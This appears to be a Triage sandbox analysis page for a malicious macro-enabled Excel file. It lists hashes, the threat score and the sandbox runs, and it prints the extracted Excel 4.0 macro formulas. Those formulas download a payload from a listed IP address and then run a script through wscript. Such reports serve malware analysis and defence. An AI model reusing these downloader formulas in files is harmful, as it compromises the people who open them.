c38f5058c9c4165d73330fe58cfdcbc0 | Triage

Submit
Reports

Overview

overview

Static

static

c38f5058c9...0.xlsm

windows7-x64

c38f5058c9...0.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

c38f5058c9c4165d73330fe58cfdcbc0.xlsm

Resource

win7-20231129-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

c38f5058c9c4165d73330fe58cfdcbc0.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

c38f5058c9c4165d73330fe58cfdcbc0
Size

6KB
MD5

c38f5058c9c4165d73330fe58cfdcbc0
SHA1

117177a4d560d63e9ed6bface71db55c8a9ac27c
SHA256

c105042eed96270d0a14f6dfbd8e0a56e4f7b9ab683e76dea3e5c01466d17310
SHA512

46043834e9b37af17b238087d7ab692d3c5a89ada3ec986c1c5c8e0772086874aaa0152b7f7ff063a8522ea1eaa1582912b6ac0e93d7d774b7dd80c4df84fa8c
SSDEEP

192:NDS9uSbbrA2OmmfRi8UhHFBFYusb98yEn++:Nau8M2wk1FY5b98yE9

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

c38f5058c9c4165d73330fe58cfdcbc0
.xlsm office2007

© 2018-2025

Terms | Privacy